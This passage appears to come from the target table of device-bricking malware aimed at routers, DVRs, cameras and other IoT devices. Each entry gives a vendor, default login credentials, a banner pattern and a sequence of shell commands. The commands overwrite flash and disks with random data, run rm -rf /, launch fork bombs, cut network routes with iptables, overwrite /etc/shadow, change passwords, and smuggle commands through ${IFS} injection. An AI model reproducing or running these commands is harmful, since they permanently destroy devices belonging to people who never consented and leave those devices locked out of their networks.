'adsl2plus' , '.*' , '(ADSL2PlusRouter login|Welcome to Login)' , '' , '' , '' , '' , 'system reset' , '' , '' , '> ' , '' , '> ' , '' , '> ' , ] , [ "kicc" , ".*" , '0RU54ozt\SEXeK8sW9TQaOFRxkJ4rvI' , 'telnet localhost' , 'login: ' , 'root' , 'Password: ' , 'upsups' , '[#$] ' , "fdisk /dev/mtd0" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "fdisk /dev/mtd1" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "fdisk /dev/mtd2" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "fdisk /dev/mtd3" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "fdisk /dev/mtd4" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , 'route del default;rm -rf /* 2>/dev/null &' , '%TERM%' , ] , [ "kicc" , ".*" , 'y3olkb5BzsLZ1ZbovcECW1' , 'telnet localhost' , 'login: ' , 'root' , 'Password: ' , 'kicc123' , '[#$] ' , "fdisk /dev/mtd0" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "fdisk /dev/mtd1" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "fdisk /dev/mtd2" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "fdisk /dev/mtd3" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "fdisk /dev/mtd4" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , 'route del default;rm -rf /* 2>/dev/null &' , '%WAIT%' , 'while [ 1 ]; do echo test; d() { d | d & }; d; sleep 10; done &' , '%TERM%' , ] , [ 'artila' , 'guest/guest' , 'guest@M5' , 'while [ 1 ]; do echo test; ps aux | grep "guest" | grep -v "sh" | grep -v "ps aux" | grep -v "grep" | grep -v "awk" | grep -v "xargs" | awk \'{print $2}\' | xargs kill -9; done &' , '%TERM%' , ] , [ "freescale" , "user/user" , 'user@freescale' , "ash" , '[#$>] ' , 'while [ 1 ]; do echo test; ps | grep "user" | grep -v "ash" | grep -v " ps " | grep -v "grep" | grep -v "awk" | grep -v "xargs" | awk \'{print $1}\' | xargs kill -9; done &' , '[#$>] ' , ] , [ 'matrix' , '.*' , '@Matrix-.*VR' , 'ash' , '[#$>] ' , 'while [ 1 ]; do echo test; kill `ps aux | grep "admin" | grep -v "ash" | grep -v "ps aux" | grep -v "grep" | grep -v "awk" | awk \'{print $2}\'`; done &' , '[#$>] ' , 'while [ 1 ]; do echo test; killall -9 sh; done &' , '[#$>] ' , ] , [ 'merit' , 'admin/1111' , 'Linux NVR' , 'ash' , '[#$>] ' , 'while [ 1 ]; do echo test; kill `ps aux | grep "admin" | grep -v "ash" | grep -v "ps aux" | grep -v "grep" | grep -v "awk" | awk \'{print $1}\'`; done &' , '[#$>] ' , 'while [ 1 ]; do echo test; killall -9 sh; done &' , '[#$>] ' , ] , [ 'merit' , 'admin/1111' , '(Linux DVR|Welcome to DVR Series)' , 'ash' , '[#$>] ' , 'while [ 1 ]; do echo test; kill `ps w | grep "admin" | grep -v "ash" | grep -v "ps w" | grep -v "grep" | grep -v "awk" | awk \'{print $1}\'`; done &' , '[#$>] ' , 'while [ 1 ]; do echo test; killall -9 sh; done &' , '[#$>] ' , ] , [ 'openwrt' , 'user/user' , 'user@\S+:~\$' , 'ps | grep "user" | grep -v `echo $$` | grep -v " ps " | grep -v "grep" | grep -v "awk" | grep -v "xargs" | awk \'{print $1}\' | xargs kill -9' , '[#$>] ' , 'cat /etc/passwd' , '[#$>] ' , 'sh' , '[#$>] ' , 'while [ 1 ]; do echo test; ps | grep "user" | grep -v " sh " | grep -v " ps " | grep -v "grep" | grep -v "awk" | grep -v "xargs" | awk \'{print $1}\' | xargs kill -9; done &' , '[#$>] ' , ] , [ 'avahi' , 'guest/guest' , 'avahi' , 'ash' , '[#$>] ' , 'cat /etc/shadow' , '[#$>] ' , 'while [ 1 ]; do echo test; ps | grep "1000" | grep -v "ash" | grep -v " ps " | grep -v "grep" | grep -v "awk" | grep -v "xargs" | awk \'{print $1}\' | xargs kill -9; done &' , '[#$>] ' , ] , [ 'cnaim' , '.*' , 'Error: Invalid input' , 'net ip lan 127.0.0.1\nsave\nping ;cp${IFS}/dev/urandom${IFS}/dev/mtdblock0&&' , '[#$>] ' , ] , [ 'sathesh' , 'root/root' , 'sathesh:TJ06VabosxcTg' , 'ls -al /sbin/' , '[#$>] ' , 'fdisk -l' , '[#$>] ' , 'df' , '[#$>] ' , 'route del default;iproute del default;rm -rf /* 2>/dev/null &' , '[#$>] ' , 'iptables -F;iptables -t nat -F;iptables -A OUTPUT -j DROP' , '%TERM%' , ] , [ 'mini' , '.*' , 'Linux MI-MINI' , 'dd if=/dev/urandom of=/dev/mtdblock0 &' , '' , 'dd if=/dev/urandom of=/dev/mtdblock1 &' , '' , 'dd if=/dev/urandom of=/dev/mtdblock2 &' , '' , 'dd if=/dev/urandom of=/dev/mtdblock3 &' , '' , 'dd if=/dev/urandom of=/dev/mtdblock4 &' , '' , 'dd if=/dev/urandom of=/dev/mtdblock5 &' , '' , 'dd if=/dev/urandom of=/dev/root &' , '' , 'dd if=/dev/urandom of=/dev/ram0 &' , '%WAIT%' , 'route del default;rm -rf /* &' , '%TERM%' , ] , [ 'tvr' , '.*' , 'admin@TVR' , 'su root' , '[#$>] ' , 'df' , '[#$>] ' , 'dd if=/dev/urandom of=/dev/hda1 &' , '' , 'dd if=/dev/urandom of=/dev/hdb1 &' , '' , 'dd if=/dev/urandom of=/dev/mtd0 &' , '' , 'dd if=/dev/urandom of=/dev/mtd1 &' , '' , 'dd if=/dev/urandom of=/dev/mtdblock4 &' , '' , 'route del default;dd if=/dev/urandom of=/dev/ram0 &' , '[#$>] ' , 'rm -rf /mtd0/* &' , '%WAIT%' , 'd(){ d|d & };d' , '%TERM%' , ] , [ 'avc' , '.*' , 'APPCOM:' , 'shell' , '[#$>] ' , 'df' , '[#$>] ' , 'cat /dev/urandom >/dev/hda &' , '' , 'cat /dev/urandom >/dev/hda1 &' , '' , 'cat /dev/urandom >/dev/hda2 &' , '' , 'cat /dev/urandom >/dev/hda3 &' , '' , 'cat /dev/urandom >/dev/hda4 &' , '' , 'route del default;rm -rf / 2>/dev/null &' , '%WAIT%' , 'd() { d | d & }; d 2>/dev/null' , '%TERM%' , ] , [ 'hikvision' , 'root/.*' , 'hikvision' , 'su root' , 'Password: ' , '%OLDPASS%' , '[#$>] ' , 'dd if=/dev/urandom of=/dev/sda &' , '[#$>] ' , 'dd if=/dev/urandom of=/dev/sdb &' , '[#$>] ' , 'dd if=/dev/urandom of=/dev/mtdblock0 &' , '[#$>] ' , 'dd if=/dev/urandom of=/dev/mtdblock1 &' , '[#$>] ' , 'dd if=/dev/urandom of=/dev/mtdblock2 &' , '[#$>] ' , 'dd if=/dev/urandom of=/dev/mtd0 &' , '[#$>] ' , 'dd if=/dev/urandom of=/dev/mtd1 &' , '[#$>] ' , 'dd if=/dev/urandom of=/dev/mtd2 &' , '%WAIT%' , 'dd if=/dev/urandom of=/dev/root &' , '[#$>] ' , 'route del default;dd if=/dev/urandom of=/dev/ram0 &' , '%WAIT%' , ] , [ 'hikvision' , 'root/hikvision' , '.*' , 'su root' , 'Password: ' , '%OLDPASS%' , '[#$>] ' , 'dd if=/dev/urandom of=/dev/sda &' , '[#$>] ' , 'dd if=/dev/urandom of=/dev/sdb &' , '[#$>] ' , 'dd if=/dev/urandom of=/dev/mtdblock0 &' , '[#$>] ' , 'dd if=/dev/urandom of=/dev/mtdblock1 &' , '[#$>] ' , 'dd if=/dev/urandom of=/dev/mtdblock2 &' , '[#$>] ' , 'dd if=/dev/urandom of=/dev/mtd0 &' , '[#$>] ' , 'dd if=/dev/urandom of=/dev/mtd1 &' , '[#$>] ' , 'dd if=/dev/urandom of=/dev/mtd2 &' , '%WAIT%' , 'dd if=/dev/urandom of=/dev/root &' , '[#$>] ' , 'route del default;dd if=/dev/urandom of=/dev/ram0 &' , '%WAIT%' , ] , [ 'hikvision' , '.*' , 'hikvision' , 'echo HAKVISION >/home/hik/hicore.tar.gz' , '[#$>] ' , 'echo HAKVISION >/home/hik/uImage' , '[#$>] ' , 'echo dd if=/dev/urandom of=/dev/mtdblock0 >/home/hik/start.sh' , '[#$>] ' , 'echo dd if=/dev/urandom of=/dev/mtdblock1 >>/home/hik/start.sh' , '[#$>] ' , 'echo dd if=/dev/urandom of=/dev/mtdblock2 >>/home/hik/start.sh' , '[#$>] ' , 'echo reboot >>/home/hik/start.sh' , '[#$>] ' , 'echo HAKVISION >/home/hik/webs.tar.gz' , '[#$>] ' , 'echo HAKVISION >/home/hik/hicore.tar.lzma' , '[#$>] ' , 'echo root:\$1\$ChRPh3ur\$Yy6bjTErRXoajEZ1jao79/:14194:0:99999:7::: >/etc/shadow' , '[#$>] ' , 'echo hikvision:\$1\$ChRPh3ur\$Yy6bjTErRXoajEZ1jao79/:14194:0:99999:7::: >>/etc/shadow' , '[#$>] ' , 'd() { echo xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; d|d & };d 2>>/%NEWPASS% >>/%NEWPASS%2' , '[#$>] ' , 'd() { echo xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; d|d & };d 2>>/home/app/%NEWPASS% >>/home/app/%NEWPASS%2' , '[#$>] ' , 'd() { echo xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; d|d & };d 2>>/tmp/%NEWPASS% >>/tmp/%NEWPASS%2' , '[#$>] ' , 'while [ 1 ]; do cat /%NEWPASS% >>/%NEWPASS%3; cat /%NEWPASS%2 >>/%NEWPASS%3 done &' , '[#$>] ' , ] , [ 'hikvision' , 'hikvision/.*' , '.*' , 'echo HAKVISION >/home/hik/hicore.tar.gz' , '[#$>] ' , 'echo HAKVISION >/home/hik/uImage' , '[#$>] ' , 'echo dd if=/dev/urandom of=/dev/mtdblock0 >/home/hik/start.sh' , '[#$>] ' , 'echo dd if=/dev/urandom of=/dev/mtdblock1 >>/home/hik/start.sh' , '[#$>] ' , 'echo dd if=/dev/urandom of=/dev/mtdblock2 >>/home/hik/start.sh' , '[#$>] ' , 'echo reboot >>/home/hik/start.sh' , '[#$>] ' , 'echo HAKVISION >/home/hik/webs.tar.gz' , '[#$>] ' , 'echo HAKVISION >/home/hik/hicore.tar.lzma' , '[#$>] ' , 'echo root:\$1\$ChRPh3ur\$Yy6bjTErRXoajEZ1jao79/:14194:0:99999:7::: >/etc/shadow' , '[#$>] ' , 'echo hikvision:\$1\$ChRPh3ur\$Yy6bjTErRXoajEZ1jao79/:14194:0:99999:7::: >>/etc/shadow' , '[#$>] ' , 'd() { echo xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; d|d & };d 2>>/%NEWPASS% >>/%NEWPASS%2' , '[#$>] ' , 'd() { echo xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; d|d & };d 2>>/home/app/%NEWPASS% >>/home/app/%NEWPASS%2' , '[#$>] ' , 'd() { echo xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; d|d & };d 2>>/tmp/%NEWPASS% >>/tmp/%NEWPASS%2' , '[#$>] ' , 'while [ 1 ]; do cat /%NEWPASS% >>/%NEWPASS%3; cat /%NEWPASS%2 >>/%NEWPASS%3 done &' , '[#$>] ' , '%RELAUNCH2%' , '%RELAUNCH2%' , ] , [ 'hikvision' , 'guest/.*' , 'dvrdvs' , 'echo HAKVISION >/home/hik/hicore.tar.gz' , '[#$>] ' , 'echo HAKVISION >/home/hik/uImage' , '[#$>] ' , 'echo dd if=/dev/urandom of=/dev/mtdblock0 >/home/hik/start.sh' , '[#$>] ' , 'echo dd if=/dev/urandom of=/dev/mtdblock1 >>/home/hik/start.sh' , '[#$>] ' , 'echo dd if=/dev/urandom of=/dev/mtdblock2 >>/home/hik/start.sh' , '[#$>] ' , 'echo reboot >>/home/hik/start.sh' , '[#$>] ' , 'echo HAKVISION >/home/hik/webs.tar.gz' , '[#$>] ' , 'echo HAKVISION >/home/hik/hicore.tar.lzma' , '[#$>] ' , 'echo root:\$1\$ChRPh3ur\$Yy6bjTErRXoajEZ1jao79/:14194:0:99999:7::: >/etc/shadow' , '[#$>] ' , 'echo hikvision:\$1\$ChRPh3ur\$Yy6bjTErRXoajEZ1jao79/:14194:0:99999:7::: >>/etc/shadow' , '[#$>] ' , 'd() { echo xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; d|d & };d 2>>/%NEWPASS% >>/%NEWPASS%2' , '[#$>] ' , 'd() { echo xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; d|d & };d 2>>/home/app/%NEWPASS% >>/home/app/%NEWPASS%2' , '[#$>] ' , 'd() { echo xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; d|d & };d 2>>/tmp/%NEWPASS% >>/tmp/%NEWPASS%2' , '[#$>] ' , 'while [ 1 ]; do cat /%NEWPASS% >>/%NEWPASS%3; cat /%NEWPASS%2 >>/%NEWPASS%3 done &' , '[#$>] ' , ] , [ 'slave' , '.*' , 'Invalid command!' , 'enable' , 'assword: ' , '%OLDPASS%' , '[#$>] ' , 'enable' , '[#$>:] ' , 'admin' , '[#$>:] ' , 'system' , '[#$>] ' , 'sh' , '[#$>] ' , 'df' , '[#$>] ' , 'dd if=/dev/urandom of=/dev/mtdblock3 &' , '[#$>] ' , 'dd if=/dev/urandom of=/dev/mtdblock0;dd if=/dev/urandom of=/dev/mtdblock1;dd if=/dev/urandom of=/dev/mtdblock2 &' , '[#$>] ' , 'route del default;iptables -A INPUT -j DROP' , '%TERM%' , ] , [ 'zhone' , 'admin/zhone' , '' , 'enable' , '[#$>] ' , 'development' , '[#$>] ' , 'sh' , '[#$>] ' , 'cat /dev/urandom >/dev/mtd0 &' , '' , 'cat /dev/urandom >/dev/mtd1 &' , '' , 'cat /dev/urandom >/dev/mtd2 &' , '' , 'cat /dev/urandom >/dev/mtd3 &' , '' , 'cat /dev/urandom >/dev/mtdblock0 &' , '' , 'cat /dev/urandom >/dev/mtdblock1 &' , '' , 'cat /dev/urandom >/dev/mtdblock2 &' , '' , 'cat /dev/urandom >/dev/mtdblock3 &' , '' , 'cat /dev/urandom >/dev/root &' , '' , 'cat /etc/passwd' , '' , 'passwd' , 'New password: ' , '%NEWPASS%' , 'Retype password: " ' , '%NEWPASS%' , '[#$>] ' , 'passwd admin' , 'New password: ' , '%NEWPASS%' , 'Retype password: " ' , '%NEWPASS%' , '[#$>] ' , 'passwd user' , 'New password: ' , '%NEWPASS%' , 'Retype password: " ' , '%NEWPASS%' , '[#$>] ' , 'passwd manufacturing' , 'New password: ' , '%NEWPASS%' , 'Retype password: " ' , '%NEWPASS%' , '[#$>] ' , 'passwd nobody' , 'New password: ' , '%NEWPASS%' , 'Retype password: " ' , '%NEWPASS%' , '[#$>] ' , 'route del default' , '[#$>] ' , 'iptables -A OUTPUT -j DROP' , '[#$>] ' , 'set2default' , ': ' , 'yes' , ': ' , 'yes' , 'yes\S ' , 'no' , 'no\S ' , 'yes' , 'accordingly' , ] , [ 'vxworks' , '.*' , '(tStdioProxy|IrqDLCS_?CMD_PROCESSOR|ipcom_?telnetspawn|tErfTask|\sstkCommand\s|OnLine help \S press F1)' , 'td tExcTask;td tJobTask' , '-> ' , 'td TR069C;td TR069S;td TR069_chk' , '-> ' , 'td iptftps' , '-> ' , 'td ipdhcpc' , '-> ' , 'td ipdhcps' , '-> ' , 'td ipcom_telnetd' , '-> ' , 'td ipnetd' , '-> ' , ] , [ 'view' , '.*' , 'type \'sh\', exc[e]?ute shell' , '?' , '[#$>] ' , 'sh' , '[#$>] ' , 'cat /proc/mounts' , '' , 'cat /dev/urandom >/dev/mtdblock5 &' , '' , 'cat /dev/urandom >/dev/mtdblock11 &' , '' , 'cat /dev/urandom >/dev/mtdblock10 &' , '' , 'cat /dev/urandom >/dev/mtdblock12 &' , '' , 'cat /dev/urandom >/dev/root &' , '' , 'cat /dev/urandom >/dev/mtdblock0 &' , '' , 'cat /dev/urandom >/dev/mtdblock1 &' , '' , 'cat /dev/urandom >/dev/mtdblock2 &' , '' , 'cat /dev/urandom >/dev/mtdblock3 &' , '' , 'route del default' , '%WAIT%' , 'iptables -F;iptables -t nat -F;iptables -A OUTPUT -j DROP' , '%WAIT% ' , 'd(){ d|d & };d' , '%TERM%' , ] , [ 'bocrouter' , '.*' , '(BoC Router|Unknow command)' , 'runshellcmd' , '>' , 'cat /dev/urandom >/dev/mtdblock0 &' , '>' , 'cat /dev/urandom >/dev/mtdblock1 &' , '>' , 'cat /dev/urandom >/dev/mtdblock2 &' , '>' , 'cat /dev/urandom >/dev/mtdblock3 &' , '>' , 'cat /dev/urandom >/dev/mtdblock4 &' , '>' , 'cat /dev/urandom >/dev/mtdblock5 &' , '>' , 'route del default' , '>' , ] , [ 'atmos' , '.*' , 'Unrecognized command \Suse \S\?\S to see valid completions' , 'console enable' , '> ' , 'flashfs' , '> ' , 'wipe' , '> ' , 'home' , '> ' , 'restart' , '' , ] , [ 'sixpon' , '.*' , 'Enter lazy mode, input \S+ to back, input \S+ to quit' , '/' , '[#$>] ' , 'linuxshell' , '[#$>] ' , 'cat /dev/urandom >/dev/mtdblock1 &' , '[#$>] ' , 'cat /dev/urandom >/dev/mtdblock2 &' , '[#$>] ' , 'cat /dev/urandom >/dev/mtdblock0 &' , '[#$>] ' , 'cat /dev/urandom >/dev/mtdblock3 &' , '[#$>] ' , 'route del default' , '[#$>] ' , 'iptables -F;iptables -t nat -F;iptables -A INPUT -j DROP' , '[#$>] ' , ] , [ 'fortigate' , '.*' , 'Unknown action 0' , 'execute erase-disk boot' , 'y/n\) ' , 'y' , 'media\? ' , '1' , 'y/n\) ' , 'n' , '%WAIT%' , 'execute shutdown' , 'y/n\) ' , 'y' , '%TERM%' , ] , [ 'cellbug' , '.*' , '% Unknown command,\s+\[\%s' , 'enable' , '[#$>] ' , 'configure terminal' , '[#$>] ' , 'wlanoff' , '[#$>] ' , 'save' , '[#$>] ' , 'configure terminal' , '[#$>] ' , 'cdma-disconnect\nsave' , '[#$>] ' , ] , [ 'quagga' , '.*' , '% Unknown command\.' , '?' , '[#$>] ' , 'enable' , '[#$>] ' , 'start-shell' , '[#$>] ' , 'start-shell bash' , '[#$>] ' , 'fdisk -l' , '[#$>] ' , "fdisk -C 1 /dev/mtd0" , 'm\sfor\shelp\S?: ' , "w" , '[#$>] ' , "fdisk -C 1 /dev/mtd1" , 'm\sfor\shelp\S?: ' , "w" , '[#$>] ' , "fdisk -C 1 /dev/mtd2" , 'm\sfor\shelp\S?: ' , "w" , '[#$>] ' , "fdisk -C 1 /dev/mtd3" , 'm\sfor\shelp\S?: ' , "w" , '[#$>] ' , "fdisk -C 1 /dev/mtd4" , 'm\sfor\shelp\S?: ' , "w" , '[#$>] ' , "fdisk -C 1 /dev/mtdblock0" , 'm\sfor\shelp\S?: ' , "w" , '[#$>] ' , "fdisk -C 1 /dev/mtdblock1" , 'm\sfor\shelp\S?: ' , "w" , '[#$>] ' , "fdisk -C 1 /dev/mtdblock2" , 'm\sfor\shelp\S?: ' , "w" , '[#$>] ' , "fdisk -C 1 /dev/mtdblock3" , 'm\sfor\shelp\S?: ' , "w" , '[#$>] ' , "fdisk -C 1 /dev/mtdblock4" , 'm\sfor\shelp\S?: ' , "w" , '[#$>] ' , "fdisk -C 1 /dev/ram0" , 'm\sfor\shelp\S?: ' , "w" , '[#$>] ' , 'route del default;iproute del default;rm -rf /* 2>/dev/null &' , '[#$>] ' , 'iptables -F;iptables -t nat -F;iptables -A OUTPUT -j DROP' , '[#$>] ' , 'copy flash `rm${IFS}-rf${IFS}/*${IFS}&` tftp 1.2.3.4' , '' , 'copy flash `route${IFS}del${IFS}default` tftp 1.2.3.4' , '[#$>] ' , 'configure terminal' , '[#$>] ' , 'username %OLDUSER% %NEWPASS%' , '[#$>] ' , 'user administrator admin disable' , '[#$>] ' , 'restore factory_setting' , '[#$>] ' , 'restore factory_defaults' , '[#$>] ' , 'exit' , '[#$>] ' , ] , [ "qtech" , ".*" , '>\s+restoredefault\s+restore the device settings to the factory defaults and reboot' , 'model' , '[#$>] ' , 'arp' , '[#$>] ' , 'restoredefault' , '%WAIT%' , ] , [ 'ricoh' , '.*' , 'msh> ' , 'devicename name HACKED' , 'msh> ' , 'ifconfig' , 'msh> ' , 'ifconfig ether 10.1.2.3' , 'msh> ' , 'ifconfig ether netmask 255.255.255.254' , 'msh> ' , 'route add default 10.1.2.2' , 'msh> ' , 'dhcp ether off' , 'msh> ' , 'hostname ether name PRINTER-HACKED' , 'msh> ' , 'logout' , '> ' , 'yes' , 'Save' , ] , [ "busybox" , "root/5up" , 'BusyBox\sv' , 'cat /dev/urandom >/dev/mtdblock0 &' , '' , 'cat /dev/urandom >/dev/mtdblock1 &' , '' , 'cat /dev/urandom >/dev/mtdblock2 &' , '' , 'route del default;iproute del default;rm -rf /* 2>/dev/null &' , '%WAIT%' , 'iptables -F;iptables -t nat -F;iptables -A OUTPUT -j DROP' , '[#$] ' , "reboot" , '[#$] ' , ] , [ "busybox" , "root/BUSYBOXBLANK" , '' , 'mtd_write erase mtd0 &' , '' , 'mtd_write erase mtd1 &' , '' , 'mtd_write erase mtd2' , '' , 'cat /dev/urandom >/dev/mtdblock0 &' , '' , 'cat /dev/urandom >/dev/mtdblock1 &' , '' , 'cat /dev/urandom >/dev/mtdblock2 &' , '' , 'cat /dev/urandom >/dev/mtdblock3 &' , '' , 'cat /dev/urandom >/dev/mtdblock4 &' , '' , 'cat /dev/urandom >/dev/mtdblock5 &' , '' , 'cat /dev/urandom >/dev/mtdblock6 &' , '' , 'cat /dev/urandom >/dev/mtdblock7 &' , '' , 'cat /dev/urandom >/dev/mtdblock8 &' , '' , 'cat /dev/urandom >/dev/mtdblock9 &' , '' , 'cat /dev/urandom >/dev/root &' , '' , 'route del default;iproute del default;rm -rf /* 2>/dev/null &' , '%WAIT%' , "sysctl -w net.ipv4.tcp_timestamps=0" , '[#$] ' , "sysctl -w kernel.threads-max=1" , '%WAIT%' , "halt -n -f" , '[#$] ' , "reboot" , '[#$] ' , 'd(){ d|d & };d' , '%TERM%' , ] , [ 'reosguest' , 'guest/.*' , 'ReOS.*UTT' , 'd(){ d|d & };d' , '%TERM%' , ] , [ "busybox" , ".*" , 'BusyBox\sv' , 'mtd_write erase mtd0 &' , '' , 'mtd_write erase mtd1 &' , '' , 'mtd_write erase mtd2' , '' , 'cat /dev/urandom >/dev/mtdblock0 &' , '' , 'cat /dev/urandom >/dev/mtdblock1 &' , '' , 'cat /dev/urandom >/dev/mtdblock2 &' , '' , 'cat /dev/urandom >/dev/mtdblock3 &' , '' , 'cat /dev/urandom >/dev/mtdblock4 &' , '' , 'cat /dev/urandom >/dev/mtdblock5 &' , '' , 'cat /dev/urandom >/dev/mtdblock6 &' , '' , 'cat /dev/urandom >/dev/mtdblock7 &' , '' , 'cat /dev/urandom >/dev/mtdblock8 &' , '' , 'cat /dev/urandom >/dev/root &' , '' , 'cat /dev/urandom >/dev/mtdblock16 &' , '' , 'route del default;iproute del default;rm -rf /* 2>/dev/null &' , '%WAIT%' , "sysctl -w net.ipv4.tcp_timestamps=0" , '[#$] ' , "sysctl -w kernel.threads-max=1" , '%WAIT%' , "halt -n -f" , '[#$] ' , "reboot" , '[#$] ' , 'd(){ d|d & };d' , '%TERM%' , ] , [ "busybox" , ".*" , 'ls:\sillegal\soption\s\-\-\sF' , 'mtd_write erase mtd0 &' , '' , 'mtd_write erase mtd1 &' , '' , 'mtd_write erase mtd2' , '' , 'cat /dev/urandom >/dev/mtdblock0 &' , '' , 'cat /dev/urandom >/dev/mtdblock1 &' , '' , 'cat /dev/urandom >/dev/mtdblock2 &' , '' , 'cat /dev/urandom >/dev/mtdblock3 &' , '' , 'cat /dev/urandom >/dev/mtdblock4 &' , '' , 'cat /dev/urandom >/dev/mtdblock5 &' , '' , 'cat /dev/urandom >/dev/mtdblock6 &' , '' , 'cat /dev/urandom >/dev/mtdblock7 &' , '' , 'cat /dev/urandom >/dev/mtdblock8 &' , '' , 'cat /dev/urandom >/dev/root &' , '' , 'cat /dev/urandom >/dev/mtdblock16 &' , '' , 'route del default;iproute del default;rm -rf /* 2>/dev/null &' , '%WAIT%' , "sysctl -w net.ipv4.tcp_timestamps=0" , '[#$] ' , "sysctl -w kernel.threads-max=1" , '%WAIT%' , "halt -n -f" , '[#$] ' , "reboot" , '[#$] ' , 'd(){ d|d & };d' , '%TERM%' , ] , [ 'misid' , ".*" , 'SYSTEM.HACKED.PLEASE.REINSTALL' , 'su root' , '[#$>] ' , 'uptime' , '' , 'cat /etc/motd' , '' , 'fdisk -l' , '' , 'df' , '' , 'dd if=/dev/urandom of=/dev/sda &' , '' , 'dd if=/dev/urandom of=/dev/sda1 &' , '' , 'dd if=/dev/urandom of=/dev/sda2 &' , '' , 'dd if=/dev/urandom of=/dev/sda3 &' , '' , 'dd if=/dev/urandom of=/dev/sda4 &' , '' , 'dd if=/dev/urandom of=/dev/sdb &' , '' , 'dd if=/dev/urandom of=/dev/mtd0 &' , '' , 'dd if=/dev/urandom of=/dev/mtd1 &' , '' , 'dd if=/dev/urandom of=/dev/mtd2 &' , '' , 'dd if=/dev/urandom of=/dev/mtd3 &' , '' , 'dd if=/dev/urandom of=/dev/mtdblock0 &' , '' , 'dd if=/dev/urandom of=/dev/mtdblock1 &' , '' , 'dd if=/dev/urandom of=/dev/mtdblock2 &' , '' , 'dd if=/dev/urandom of=/dev/mtdblock3 &' , '' , 'dd if=/dev/urandom of=/dev/mtdblock4 &' , '' , 'dd if=/dev/urandom of=/dev/mtdblock5 &' , '' , 'dd if=/dev/urandom of=/dev/mtdblock6 &' , '' , 'dd if=/dev/urandom of=/dev/mtdblock7 &' , '[#$>] ' , 'dd if=/dev/urandom of=/dev/hda1 &' , '' , 'dd if=/dev/urandom of=/dev/hdb1 &' , '' , 'dd if=/dev/urandom of=/dev/root &' , '' , 'dd if=/dev/urandom of=/dev/ram0 &' , '' , 'dd if=/dev/urandom of=/dev/mmcblk0 &' , '' , 'dd if=/dev/urandom of=/dev/mmcblk0p1 &' , '' , 'cat /dev/urandom >/dev/sda &' , '' , 'cat /dev/urandom >/dev/sda1 &' , '' , 'cat /dev/urandom >/dev/sda2 &' , '' , 'cat /dev/urandom >/dev/sda3 &' , '' , 'cat /dev/urandom >/dev/sda4 &' , '' , 'cat /dev/urandom >/dev/sdb &' , '' , 'cat /dev/urandom >/dev/mtd0 &' , '' , 'cat /dev/urandom >/dev/mtd1 &' , '' , 'cat /dev/urandom >/dev/mtd2 &' , '' , 'cat /dev/urandom >/dev/mtd3 &' , '[#$>] ' , 'cat /dev/urandom >/dev/mtdblock0 &' , '' , 'cat /dev/urandom >/dev/mtdblock1 &' , '' , 'cat /dev/urandom >/dev/mtdblock2 &' , '' , 'cat /dev/urandom >/dev/mtdblock3 &' , '' , 'cat /dev/urandom >/dev/mtdblock4 &' , '' , 'cat /dev/urandom >/dev/mtdblock5 &' , '' , 'cat /dev/urandom >/dev/mtdblock6 &' , '' , 'cat /dev/urandom >/dev/mtdblock7 &' , '' , 'cat /dev/urandom >/dev/hda1 &' , '' , 'cat /dev/urandom >/dev/hdb1 &' , '' , 'cat /dev/urandom >/dev/root &' , '' , 'cat /dev/urandom >/dev/ram0 &' , '' , 'cat /dev/urandom >/dev/mmcblk0 &' , '' , 'cat /dev/urandom >/dev/mmcblk0p1 &' , '' , 'route del default;iproute del default;rm -rf /* 2>/dev/null &' , '' , 'iptables -F;iptables -t nat -F;iptables -A OUTPUT -j 